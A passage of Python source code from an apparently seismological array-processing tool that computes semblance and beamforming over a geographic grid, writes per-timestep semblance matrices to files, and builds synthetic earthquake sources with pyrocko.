dtype=num.float)\n\n assert num.all(lats == lats[0]) and num.all(lons == lons[0])\n lat, lon = lats[0], lons[0]\n\n # if not same use:\n # lat, lon = center_latlon(subsources)\n\n depth = float(num.mean([p.depth for p in subsources]))\n t = float(num.mean([p.time for p in subsources]))\n kwargs.update(time=t, lat=float(lat), lon=float(lon), depth=depth)\n\n gf.Source.__init__(self, subsources=subsources, **kwargs)\n\n def get_factor(self):\n return 1.0\n\n def discretize_basesource(self, store, target=None):\n\n dsources = []\n t0 = self.subsources[0].time\n for sf in self.subsources:\n assert t0 == sf.time\n ds = sf.discretize_basesource(store, target)\n ds.m6s *= sf.get_factor()\n dsources.append(ds)\n\n return gf.DiscretizedMTSource.combine(dsources)\n\n\n\n\nclass CakeTiming(Object):\n '''Calculates and caches phase arrivals.\n :param fallback_time: returned, when no phase arrival was found for the\n given depth-distance-phase-selection-combination\n\n E.g.:\n definition = 'first(p,P)-20'\n CakeTiming(definition)'''\n phase_selection = String.T()\n fallback_time = Float.T(optional=True)\n\n def __init__(self, phase_selection, fallback_time=None):\n self.arrivals = defaultdict(dict)\n self.fallback_time = fallback_time\n self.which = None\n self.phase_selection = phase_selection\n _phase_selection = phase_selection\n if '+' in _phase_selection:\n _phase_selection, self.offset = _phase_selection.split('+')\n self.offset = float(self.offset)\n elif '-' in _phase_selection:\n _phase_selection, self.offset = _phase_selection.split('-')\n self.offset = float(self.offset)\n self.offset = -self.offset\n\n if 'first' in _phase_selection:\n self.which = 'first'\n if 'last' in _phase_selection:\n self.which = 'last'\n if self.which:\n _phase_selection = self.strip(_phase_selection)\n\n self.phases = _phase_selection.split('|')\n\n def return_time(self, ray):\n if ray is None:\n return self.fallback_time\n else:\n return ray.t + self.offset\n\n def t(self, mod, z_dist, get_ray=False):\n ''':param phase_selection: phase names speparated by vertical bars\n :param z_dist: tuple with (depth, distance)\n '''\n z, dist = z_dist\n if (dist, z) in self.arrivals.keys():\n return self.return_time(self.arrivals[(dist, z)])\n\n phases = [cake.PhaseDef(pid) for pid in self.phases]\n arrivals = mod.arrivals(\n distances=[dist*cake.m2d], phases=phases, zstart=z)\n if arrivals == []:\n logger.warn(\n 'no phase at d=%s, z=%s. (return fallback time)' % (dist, z))\n want = None\n else:\n want = self.phase_selector(arrivals)\n self.arrivals[(dist, z)] = want\n if get_ray:\n return want\n else:\n return self.return_time(want)\n\n def phase_selector(self, _list):\n if self.which == 'first':\n return min(_list, key=lambda x: x.t)\n if self.which == 'last':\n return max(_list, key=lambda x: x.t)\n\n def strip(self, ps):\n ps = ps.replace(self.which, '')\n ps = ps.rstrip(')')\n ps = ps.lstrip('(')\n return ps\n\n\nclass Timings(Object):\n timings = List.T(CakeTiming.T())\n\n def __init__(self, timings):\n self.timings = timings\n\n\nclass SembMax (object):\n '''\n class to store sembmax object for each grid point\n '''\n\n def __init__(self, lat, lon, semb):\n\n self.lat = lat\n self.lon = lon\n self.semb = semb\n\n# -------------------------------------------------------------------------------------------------\n\nclass FileSembMax(object):\n '''\n class to strore sembmax object for the sembmaxvalue file\n '''\n def __init__(self,istep,sembmaxX,sembmaxY,sembmax,usedarrays,delta,azi,deltakm):\n\n self.istep = istep\n self.sembmaxX = sembmaxX\n self.sembmaxY = sembmaxY\n self.sembmax= sembmax\n self.usedarrays = usedarrays\n self.delta = delta\n self.azi= azi\n self.deltakm= deltakm\n\n def get(self):\n return ('%d %.2f %.2f %f %d %03f %f %03f\\n' % (self.istep,self.sembmaxX,self.sembmaxY,\n self.sembmax,self.usedarrays,self.delta,\n self.azi,self.delta*119.19))\n\n# -------------------------------------------------------------------------------------------------\n\ndef toAzimuth (latevent,lonevent,latsource,lonsource):\n '''\n method to calculate azimuth between two points\n '''\n # Convert to radians.\n lat1 = radians (latsource);\n lon1 = radians (lonsource);\n lat2 = radians (latevent);\n lon2 = radians (lonevent);\n\n # Compute the angle.\n x = sin(lon1-lon2 ) * cos(lat2);\n y = cos(lat1) * sin(lat2) - sin(lat1) * cos(lat2) * cos(lon1-lon2);\n angle = -atan2 (x,y);\n\n if angle < 0.0 :\n angle += math.pi * 2.0;\n\n #And convert result to degrees.\n angle = math.degrees (angle)\n angle = '%02f'%angle\n\n return angle;\n\n# -------------------------------------------------------------------------------------------------\n\ndef writeSembMatricesSingleArray (SembList,Config,Origin,arrayfolder,ntimes,switch):\n '''\n method to write semblance matrizes from one processes to file for each timestep\n '''\n logger.info ('start write semblance matrices')\n\n cfg= ConfigObj (dict=Config)\n origin = OriginCfg (Origin)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n latv = []\n lonv = []\n\n gridspacing = cfg.Float ('gridspacing')\n migpoints = dimX * dimY\n\n o_lat = origin.lat() # float (Origin['lat'])\n o_lon = origin.lon() # float (Origin['lon'])\n oLatul = 0\n oLonul = 0\n\n z=0\n\n for i in xrange(dimX):\n oLatul = o_lat - ((dimX-1)/2) * gridspacing + i*gridspacing\n\n if z == 0 and i == 0:\n Latul = oLatul\n o=0\n\n for j in xrange (dimY):\n oLonul = o_lon - ((dimY-1)/2) * gridspacing + j * gridspacing\n\n if o==0 and j==0: Lonul = oLonul\n\n latv.append (oLatul)\n lonv.append (oLonul)\n #endfor\n\n rc = UTCDateTime (Origin['time'])\n rcs = '%s-%s-%s_%02d:%02d:%02d'% (rc.day,rc.month,rc.year, rc.hour,rc.minute,rc.second)\n d = rc.timestamp\n\n for a, i in enumerate(SembList):\n #logger.info('timestep %d' % a)\n\n fobj = open (os.path.join (arrayfolder,'%s-%s_%03d.ASC' % (switch,Origin['depth'],a)),'w')\n fobj.write ('# %s , %s\\n' % (d,rcs))\n fobj.write ('# step %ds| ntimes %d| winlen: %ds\\n' % (step,ntimes,winlen))\n fobj.write ('# \\n')\n fobj.write ('# southwestlat: %.2f dlat: %f nlat: %f \\n'%(Latul,gridspacing,dimX))\n fobj.write ('# southwestlon: %.2f dlon: %f nlon: %f \\n'%(Lonul,gridspacing,dimY))\n fobj.write ('# ddepth: 0 ndepth: 1 \\n')\n\n for j in range (migpoints):\n x= latv[j]\n y= lonv[j]\n z= origin.depth() # float(Origin['depth'])\n semb = i[j]\n\n fobj.write ('%.2f %.2f %.2f %.20f\\n' % (x,y,z,semb))\n #endfor\n\n fobj.close()\n #endfor\n\n# -------------------------------------------------------------------------------------------------\n\ndef collectSemb (SembList,Config,Origin,Folder,ntimes,arrays,switch):\n '''\n method to collect semblance matrizes from all processes and write them to file for each timestep\n '''\n Logfile.add ('start collect in collectSemb')\n\n cfg= ConfigObj (dict=Config)\n origin = ConfigObj (dict=Origin)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n latv= []\n lonv= []\n\n gridspacing = cfg.Float ('gridspacing')\n migpoints = dimX * dimY\n o_lat = origin.lat() # float (Origin['lat'])\n o_lon = origin.lon() # float (Origin['lon'])\n oLatul = 0\n oLonul = 0\n\n z=0\n\n for i in xrange(dimX):\n oLatul = o_lat - ((dimX-1)/2) * gridspacing + i*gridspacing\n\n if z == 0 and i == 0 :\n Latul = oLatul\n o=0\n\n for j in xrange (dimY):\n oLonul = o_lon - ((dimY-1)/2) * gridspacing + j*gridspacing\n\n if o==0 and j==0:\n Lonul = oLonul\n\n latv.append (oLatul)\n lonv.append (oLonul)\n\n\n tmp=1\n for a in SembList:\n tmp *= a\n #sys.exit()\n\n sembmaxvaluev = num.ndarray (ntimes,dtype=float)\n sembmaxlatv = num.ndarray (ntimes,dtype=float)\n sembmaxlonv = num.ndarray (ntimes,dtype=float)\n\n rc= UTCDateTime(Origin['time'])\n rcs= '%s-%s-%s_%02d:%02d:%02d'% (rc.day,rc.month,rc.year, rc.hour,rc.minute,rc.second)\n d = rc.timestamp\n usedarrays = 5\n\n folder = Folder['semb']\n fobjsembmax = open (os.path.join (folder,'sembmax_%s.txt' % (switch)),'w')\n for a, i in enumerate(tmp):\n logger.info('timestep %d' % a)\n\n\n fobj = open (os.path.join (folder,'%s-%s_%03d.ASC' % (switch,Origin['depth'],a)),'w')\n #fobj = open (os.path.join (folder, '%03d.ASC' % a),'w')\n\n fobj.write ('# %s , %s\\n' % (d,rcs))\n fobj.write ('# step %ds| ntimes %d| winlen: %ds\\n' % (step,ntimes,winlen))\n fobj.write ('# \\n')\n fobj.write ('# southwestlat: %.2f dlat: %f nlat: %f \\n'%(Latul,gridspacing,dimX))\n fobj.write ('# southwestlon: %.2f dlon: %f nlon: %f \\n'%(Lonul,gridspacing,dimY))\n fobj.write ('# ddepth: 0 ndepth: 1 \\n')\n\n\n sembmax = 0\n sembmaxX = 0\n sembmaxY = 0\n\n origin = DataTypes.dictToLocation (Origin)\n uncert = num.std(i) #maybe not std?\n for j in range(migpoints):\n x= latv[j]\n y= lonv[j]\n semb = i[j]\n\n fobj.write ('%.2f %.2f %.20f\\n' % (x,y,semb))\n\n if semb > sembmax:\n sembmax = semb;# search for maximum and position of maximum on semblance grid for given time step\n sembmaxX = x;\n sembmaxY = y;\n\n delta = loc2degrees (Location (sembmaxX, sembmaxY), origin)\n azi = toAzimuth (float(Origin['lat']), float(Origin['lon']),float(sembmaxX), float(sembmaxY))\n\n sembmaxvaluev[a] = sembmax\n sembmaxlatv[a] = sembmaxX\n sembmaxlonv[a] = sembmaxY\n\n fobjsembmax.write ('%d %.2f %.2f %.20f %.20f %d %03f %f %03f\\n' % (a*step,sembmaxX,sembmaxY,sembmax,uncert,usedarrays,delta,float(azi),delta*119.19))\n fobj.close()\n\n\n fobjsembmax.close()\n\n durationpath = os.path.join (folder, \"duration.txt\")\n trigger.writeSembMaxValue (sembmaxvaluev,sembmaxlatv,sembmaxlonv,ntimes,Config,Folder)\n trigger.semblancestalta (sembmaxvaluev,sembmaxlatv,sembmaxlonv)\n\ndef collectSembweighted(SembList,Config,Origin,Folder,ntimes,arrays,switch, weights):\n '''\n method to collect semblance matrizes from all processes and write them to file for each timestep\n '''\n Logfile.add ('start collect in collectSemb')\n\n cfg= ConfigObj (dict=Config)\n origin = ConfigObj (dict=Origin)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n latv= []\n lonv= []\n\n gridspacing = cfg.Float ('gridspacing')\n migpoints = dimX * dimY\n o_lat = origin.lat() # float (Origin['lat'])\n o_lon = origin.lon() # float (Origin['lon'])\n oLatul = 0\n oLonul = 0\n\n z=0\n\n for i in xrange(dimX):\n oLatul = o_lat - ((dimX-1)/2) * gridspacing + i*gridspacing\n\n if z == 0 and i == 0 :\n Latul = oLatul\n o=0\n\n for j in xrange (dimY):\n oLonul = o_lon - ((dimY-1)/2) * gridspacing + j*gridspacing\n\n if o==0 and j==0:\n Lonul = oLonul\n\n latv.append (oLatul)\n lonv.append (oLonul)\n\n\n tmp=1\n for a, w in zip(SembList, weights):\n tmp *= a\n #sys.exit()\n\n sembmaxvaluev = num.ndarray (ntimes,dtype=float)\n sembmaxlatv = num.ndarray (ntimes,dtype=float)\n sembmaxlonv = num.ndarray (ntimes,dtype=float)\n\n rc= UTCDateTime(Origin['time'])\n rcs= '%s-%s-%s_%02d:%02d:%02d'% (rc.day,rc.month,rc.year, rc.hour,rc.minute,rc.second)\n d = rc.timestamp\n usedarrays = 5\n\n folder = Folder['semb']\n fobjsembmax = open (os.path.join (folder,'sembmax_%s.txt' % (switch)),'w')\n\n for a, i in enumerate(tmp):\n logger.info('timestep %d' % a)\n\n\n fobj = open (os.path.join (folder,'%s-%s_%03d._weighted_semblance.ASC' % (switch,Origin['depth'],a)),'w')\n #fobj = open (os.path.join (folder, '%03d.ASC' % a),'w')\n\n fobj.write ('# %s , %s\\n' % (d,rcs))\n fobj.write ('# step %ds| ntimes %d| winlen: %ds\\n' % (step,ntimes,winlen))\n fobj.write ('# \\n')\n fobj.write ('# southwestlat: %.2f dlat: %f nlat: %f \\n'%(Latul,gridspacing,dimX))\n fobj.write ('# southwestlon: %.2f dlon: %f nlon: %f \\n'%(Lonul,gridspacing,dimY))\n fobj.write ('# ddepth: 0 ndepth: 1 \\n')\n\n\n sembmax = 0\n sembmaxX = 0\n sembmaxY = 0\n\n origin = DataTypes.dictToLocation (Origin)\n uncert = num.std(i) #maybe not std?\n for j in range(migpoints):\n x= latv[j]\n y= lonv[j]\n semb = i[j]\n\n fobj.write ('%.2f %.2f %.20f\\n' % (x,y,semb))\n\n if semb > sembmax:\n sembmax = semb;# search for maximum and position of maximum on semblance grid for given time step\n sembmaxX = x;\n sembmaxY = y;\n\n delta = loc2degrees (Location (sembmaxX, sembmaxY), origin)\n azi = toAzimuth (float(Origin['lat']), float(Origin['lon']),float(sembmaxX), float(sembmaxY))\n\n sembmaxvaluev[a] = sembmax\n sembmaxlatv[a] = sembmaxX\n sembmaxlonv[a] = sembmaxY\n\n fobjsembmax.write ('%d %.2f %.2f %.20f %.20f %d %03f %f %03f\\n' % (a*step,sembmaxX,sembmaxY,sembmax,uncert,usedarrays,delta,float(azi),delta*119.19))\n fobj.close()\n\n\n fobjsembmax.close()\n\n durationpath = os.path.join (folder, \"duration.txt\")\n trigger.writeSembMaxValue (sembmaxvaluev,sembmaxlatv,sembmaxlonv,ntimes,Config,Folder)\n trigger.semblancestalta (sembmaxvaluev,sembmaxlatv,sembmaxlonv)\n\ndef toMatrix (npVector, nColumns) :\n\n t = npVector.tolist()[0]\n n = nColumns\n mat = []\n\n for i in range (len(t) / n) :\n pos1 = i * n\n pos2 = pos1 + n\n slice = t [pos1:pos2]\n assert len(slice) == nColumns\n mat.append (slice)\n\n return mat\n\n\n\n\ndef doCalc (flag,Config,WaveformDict,FilterMetaData,Gmint,Gmaxt,TTTGridMap,Folder,Origin, ntimes, switch, ev,arrayfolder, syn_in):\n '''\n method for calculating semblance of one station array\n '''\n Logfile.add ('PROCESS %d %s' % (flag,' Enters Semblance Calculation') )\n Logfile.add ('MINT : %f MAXT: %f Traveltime' % (Gmint,Gmaxt))\n\n cfg = ConfigObj (dict=Config)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n new_frequence = cfg.newFrequency() #('new_frequence')\n forerun= cfg.Int('forerun')\n duration= cfg.Int('duration')\n gridspacing = cfg.Float('gridspacing')\n\n nostat = len (WaveformDict)\n traveltimes = {}\n recordstarttime = ''\n minSampleCount = 999999999\n\n if cfg.UInt ('forerun')>0:\n ntimes = int ((cfg.UInt ('forerun') + cfg.UInt ('duration') ) / cfg.UInt ('step') )\n else:\n ntimes = int ((cfg.UInt ('duration') ) / cfg.UInt ('step') )\n nsamp = int (winlen * new_frequence)\n nstep = int (step * new_frequence)\n from pyrocko import obspy_compat\n from pyrocko import orthodrome, model\n obspy_compat.plant()\n\n ############################################################################\n calcStreamMap = WaveformDict\n\n stations = []\n py_trs = []\n for trace in calcStreamMap.keys():\n py_tr = obspy_compat.to_pyrocko_trace(calcStreamMap[trace])\n py_trs.append(py_tr)\n for il in FilterMetaData:\n if str(il) == str(trace):\n szo = model.Station(lat=il.lat, lon=il.lon,\n station=il.sta, network=il.net,\n channels=py_tr.channel,\n elevation=il.ele, location=il.loc)\n stations.append(szo) #right number of stations?\n\n\n#==================================synthetic BeamForming=======================================\n\n if cfg.Bool('shift_by_phase_pws') == True:\n calcStreamMapshifted= calcStreamMap.copy()\n from obspy.core import stream\n stream = stream.Stream()\n for trace in calcStreamMapshifted.keys():\n stream.append(calcStreamMapshifted[trace])\n pws_stack = PWS_stack([stream], weight=2, normalize=True)\n for tr in pws_stack:\n for trace in calcStreamMapshifted.keys():\n calcStreamMapshifted[trace]=tr\n calcStreamMap = calcStreamMapshifted\n\n\n if cfg.Bool('shift_by_phase_onset') == True:\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n for trace in calcStreamMapshifted.keys():\n recordstarttime = calcStreamMapshifted[trace].stats.starttime.timestamp\n recordendtime = calcStreamMapshifted[trace].stats.endtime.timestamp\n mod = shifted_traces[i]\n extracted = mod.chop(recordstarttime, recordendtime, inplace=False)\n shifted_obs_tr = obspy_compat.to_obspy_trace(extracted)\n calcStreamMapshifted[trace]=shifted_obs_tr\n i = i+1\n\n calcStreamMap = calcStreamMapshifted\n\n\n weight = 0.\n if cfg.Bool('weight_by_noise') == True:\n from noise_analyser import analyse\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n weight = analyse(shifted_traces, engine, event, stations,\n 100., store_id, nwindows=1,\n check_events=True, phase_def='P')\n\n for trace in calcStreamMap.keys():\n recordstarttime = calcStreamMap[trace].stats.starttime\n d = calcStreamMap[trace].stats.starttime\n d = d.timestamp\n\n if calcStreamMap[trace].stats.npts < minSampleCount:\n minSampleCount = calcStreamMap[trace].stats.npts\n\n ############################################################################\n traces = num.ndarray (shape=(len(calcStreamMap), minSampleCount), dtype=float)\n traveltime = num.ndarray (shape=(len(calcStreamMap), dimX*dimY), dtype=float)\n latv = num.ndarray (dimX*dimY, dtype=float)\n lonv = num.ndarray (dimX*dimY, dtype=float)\n ############################################################################\n\n\n c=0\n streamCounter = 0\n\n for key in calcStreamMap.keys():\n streamID = key\n c2 = 0\n\n for o in calcStreamMap[key]:\n if c2 < minSampleCount:\n traces[c][c2] = o\n\n c2 += 1\n\n\n for key in TTTGridMap.keys():\n\n if streamID == key:\n traveltimes[streamCounter] = TTTGridMap[key]\n else:\n \"NEIN\", streamID, key\n\n\n if not streamCounter in traveltimes :\n continue #hs : thread crashed before\n\n g = traveltimes[streamCounter]\n dimZ = g.dimZ\n mint = g.mint\n maxt = g.maxt\n Latul = g.Latul\n Lonul = g.Lonul\n Lator = g.Lator\n Lonor = g.Lonor\n\n gridElem = g.GridArray\n\n for x in range(dimX):\n for y in range(dimY):\n elem = gridElem[x, y]\n\n traveltime [c][x * dimY + y] = elem.tt\n latv [x * dimY + y] = elem.lat\n lonv [x * dimY + y] = elem.lon\n #endfor\n\n c += 1\n streamCounter += 1\n\n #endfor\n\n\n# ==================================semblance calculation=======\n\n t1 = time.time()\n traces = traces.reshape(1, nostat*minSampleCount)\n\n traveltimes = traveltime.reshape(1, nostat*dimX*dimY)\n TTTGrid = True\n manual_shift = False\n\n if manual_shift:\n\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs = []\n calcStreamMapshifted = calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(\n calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n backSemb = num.ndarray(shape=(ntimes, dimX*dimY), dtype=float)\n bf = BeamForming(stations, traces, normalize=True)\n\n for i in range(ntimes):\n sembmax = 0\n sembmaxX = 0\n sembmaxY = 0\n for j in range(dimX * dimY):\n event = model.Event(lat=float(latv[j]), lon=float(lonv[j]),\n depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n shifted_traces, stack = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(\n directory,\n 'array_center.pf'),\n fn_beam=pjoin(directory,\n 'beam.mseed'))\n tmin = stack.tmin+(i*nstep)+20\n tmax = stack.tmin+(i*nstep)+60\n stack.chop(tmin, tmax)\n backSemb[i][j] = abs(sum(stack.ydata))\n\n k = backSemb\n TTTGrid = False\n\n if TTTGrid:\n start_time = time.time()\n if cfg.UInt('forerun') > 0:\n ntimes = int((cfg.UInt('forerun') + cfg.UInt('duration'))/step)\n else:\n ntimes = int((cfg.UInt('duration')) / step)\n nsamp = int(winlen)\n nstep = int(step)\n Gmint = cfg.Int('forerun')\n\n k = semblance(maxp, nostat, nsamp, ntimes, nstep, dimX, dimY, Gmint,\n new_frequence, minSampleCount, latv, lonv, traveltimes,\n traces, calcStreamMap, timeev, Config, Origin)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n t2 = time.time()\n\n Logfile.add('%s took %0.3f s' % ('CALC:',(t2-t1)))\n\n partSemb = k\n partSemb = partSemb.reshape(ntimes, migpoints)\n\n return partSemb\n\n\ndef doCalc_syn (flag,Config,WaveformDict,FilterMetaData,Gmint,Gmaxt,TTTGridMap,\n Folder,Origin, ntimes, switch, ev,arrayfolder, syn_in, parameter):\n '''\n method for calculating semblance of one station array\n '''\n Logfile.add ('PROCESS %d %s' % (flag,' Enters Semblance Calculation') )\n Logfile.add ('MINT : %f MAXT: %f Traveltime' % (Gmint,Gmaxt))\n\n cfg = ConfigObj (dict=Config)\n\n dimX = cfg.dimX() # ('dimx')\n dimY = cfg.dimY() # ('dimy')\n winlen = cfg.winlen () # ('winlen')\n step = cfg.step() # ('step')\n\n new_frequence = cfg.newFrequency() #('new_frequence')\n forerun= cfg.Int('forerun')\n duration= cfg.Int('duration')\n gridspacing = cfg.Float('gridspacing')\n\n nostat = len (WaveformDict)\n traveltimes = {}\n recordstarttime = ''\n minSampleCount = 999999999\n\n if cfg.UInt ('forerun')>0:\n ntimes = int ((cfg.UInt ('forerun') + cfg.UInt ('duration') ) / cfg.UInt ('step') )\n else:\n ntimes = int ((cfg.UInt ('duration') ) / cfg.UInt ('step') )\n nsamp = int (winlen * new_frequence)\n nstep = int (step * new_frequence)\n from pyrocko import obspy_compat\n from pyrocko import orthodrome, model\n obspy_compat.plant()\n\n ############################################################################\n calcStreamMap = WaveformDict\n\n stations = []\n py_trs = []\n for trace in calcStreamMap.keys():\n py_tr = obspy_compat.to_pyrocko_trace(calcStreamMap[trace])\n py_trs.append(py_tr)\n for il in FilterMetaData:\n if str(il) == str(trace):\n szo = model.Station(lat=il.lat, lon=il.lon,\n station=il.sta, network=il.net,\n channels=py_tr.channel,\n elevation=il.ele, location=il.loc)\n stations.append(szo) #right number of stations?\n\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n\n targets = []\n for st in stations:\n target = Target(\n lat=st.lat,\n lon=st.lon,\n store_id=store_id,\n codes=(st.network, st.station, st.location, 'BHZ'),\n tmin=-1900,\n tmax=3900,\n interpolation='multilinear',\n quantity=cfg.quantity())\n targets.append(target)\n\n if syn_in.nsources() == 1:\n if syn_in.use_specific_stf() is True:\n stf = syn_in.stf()\n exec(stf)\n else:\n stf = STF()\n if syn_in.source() == 'RectangularSource':\n source = RectangularSource(\n lat=float(syn_in.lat_0()),\n lon=float(syn_in.lon_0()),\n depth=syn_in.depth_syn_0()*1000.,\n strike=syn_in.strike_0(),\n dip=syn_in.dip_0(),\n rake=syn_in.rake_0(),\n width=syn_in.width_0()*1000.,\n length=syn_in.length_0()*1000.,\n nucleation_x=syn_in.nucleation_x_0(),\n slip=syn_in.slip_0(),\n nucleation_y=syn_in.nucleation_y_0(),\n stf=stf,\n time=util.str_to_time(syn_in.time_0()))\n if syn_in.source() == 'DCSource':\n source = DCSource(\n lat=float(syn_in.lat_0()),\n lon=float(syn_in.lon_0()),\n depth=syn_in.depth_syn_0()*1000.,\n strike=syn_in.strike_0(),\n dip=syn_in.dip_0(),\n rake=syn_in.rake_0(),\n stf=stf,\n time=util.str_to_time(syn_in.time_0()),\n magnitude=syn_in.magnitude_0())\n\n else:\n sources = []\n for i in range(syn_in.nsources()):\n if syn_in.use_specific_stf() is True:\n stf = syn_in.stf()\n exec(stf)\n\n else:\n stf = STF()\n if syn_in.source() == 'RectangularSource':\n sources.append(RectangularSource(\n lat=float(syn_in.lat_1(i)),\n lon=float(syn_in.lon_1(i)),\n depth=syn_in.depth_syn_1(i)*1000.,\n strike=syn_in.strike_1(i),\n dip=syn_in.dip_1(i),\n rake=syn_in.rake_1(i),\n width=syn_in.width_1(i)*1000.,\n length=syn_in.length_1(i)*1000.,\n nucleation_x=syn_in.nucleation_x_1(i),\n slip=syn_in.slip_1(i),\n nucleation_y=syn_in.nucleation_y_1(i),\n stf=stf,\n time=util.str_to_time(syn_in.time_1(i))))\n\n if syn_in.source() == 'DCSource':\n sources.append(DCSource(\n lat=float(syn_in.lat_1(i)),\n lon=float(syn_in.lon_1(i)),\n depth=syn_in.depth_1(i)*1000.,\n strike=syn_in.strike_1(i),\n dip=syn_in.dip_1(i),\n rake=syn_in.rake_1(i),\n stf=stf,\n time=util.str_to_time(syn_in.time_1(i)),\n magnitude=syn_in.magnitude_1(i)))\n source = CombiSource(subsources=sources)\n response = engine.process(source, targets)\n\n synthetic_traces = response.pyrocko_traces()\n if cfg.Bool('synthetic_test_add_noise') is True:\n from noise_addition import add_noise\n trs_orgs = []\n calcStreamMapsyn = calcStreamMap.copy()\n #from pyrocko import trace\n for tracex in calcStreamMapsyn.keys():\n for trl in synthetic_traces:\n if str(trl.name()[4:12]) == str(tracex[4:]):\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapsyn[tracex])\n tr_org.downsample_to(2.0)\n trs_orgs.append(tr_org)\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n synthetic_traces = add_noise(trs_orgs, engine, source.pyrocko_event(),\n stations,\n store_id, phase_def='P')\n trs_org = []\n trs_orgs = []\n fobj = os.path.join(arrayfolder, 'shift.dat')\n xy = num.loadtxt(fobj, usecols=1, delimiter=',')\n calcStreamMapsyn = calcStreamMap.copy()\n #from pyrocko import trace\n for tracex in calcStreamMapsyn.keys():\n for trl in synthetic_traces:\n if str(trl.name()[4:12])== str(tracex[4:]):\n mod = trl\n\n recordstarttime = calcStreamMapsyn[tracex].stats.starttime.timestamp\n recordendtime = calcStreamMapsyn[tracex].stats.endtime.timestamp\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapsyn[tracex])\n trs_orgs.append(tr_org)\n\n tr_org_add = mod.chop(recordstarttime, recordendtime, inplace=False)\n synthetic_obs_tr = obspy_compat.to_obspy_trace(tr_org_add)\n calcStreamMapsyn[tracex] = synthetic_obs_tr\n trs_org.append(tr_org_add)\n calcStreamMap = calcStreamMapsyn\n\n if cfg.Bool('shift_by_phase_pws') == True:\n calcStreamMapshifted= calcStreamMap.copy()\n from obspy.core import stream\n stream = stream.Stream()\n for trace in calcStreamMapshifted.keys():\n stream.append(calcStreamMapshifted[trace])\n pws_stack = PWS_stack([stream], weight=2, normalize=True)\n for tr in pws_stack:\n for trace in calcStreamMapshifted.keys():\n calcStreamMapshifted[trace]=tr\n calcStreamMap = calcStreamMapshifted\n\n\n if cfg.Bool('shift_by_phase_onset') == True:\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n calcStreamMapshifted= calcStreamMap.copy()\n for trace in calcStreamMapshifted.keys():\n tr_org = obspy_compat.to_pyrocko_trace(calcStreamMapshifted[trace])\n trs_orgs.append(tr_org)\n\n timing = CakeTiming(\n phase_selection='first(p|P|PP|P(cmb)P(icb)P(icb)p(cmb)p)-20',\n fallback_time=100.)\n traces = trs_orgs\n\n event = model.Event(lat=float(ev.lat), lon=float(ev.lon), depth=ev.depth*1000., time=timeev)\n directory = arrayfolder\n bf = BeamForming(stations, traces, normalize=True)\n shifted_traces = bf.process(event=event,\n timing=timing,\n fn_dump_center=pjoin(directory, 'array_center.pf'),\n fn_beam=pjoin(directory, 'beam.mseed'))\n i = 0\n store_id = syn_in.store()\n engine = LocalEngine(store_superdirs=[syn_in.store_superdirs()])\n for trace in calcStreamMapshifted.keys():\n recordstarttime = calcStreamMapshifted[trace].stats.starttime.timestamp\n recordendtime = calcStreamMapshifted[trace].stats.endtime.timestamp\n mod = shifted_traces[i]\n extracted = mod.chop(recordstarttime, recordendtime, inplace=False)\n shifted_obs_tr = obspy_compat.to_obspy_trace(extracted)\n calcStreamMapshifted[trace]=shifted_obs_tr\n i = i+1\n\n calcStreamMap = calcStreamMapshifted\n\n\n weight = 0.\n if cfg.Bool('weight_by_noise') == True:\n from noise_analyser import analyse\n pjoin = os.path.join\n timeev = util.str_to_time(ev.time)\n trs_orgs= []\n 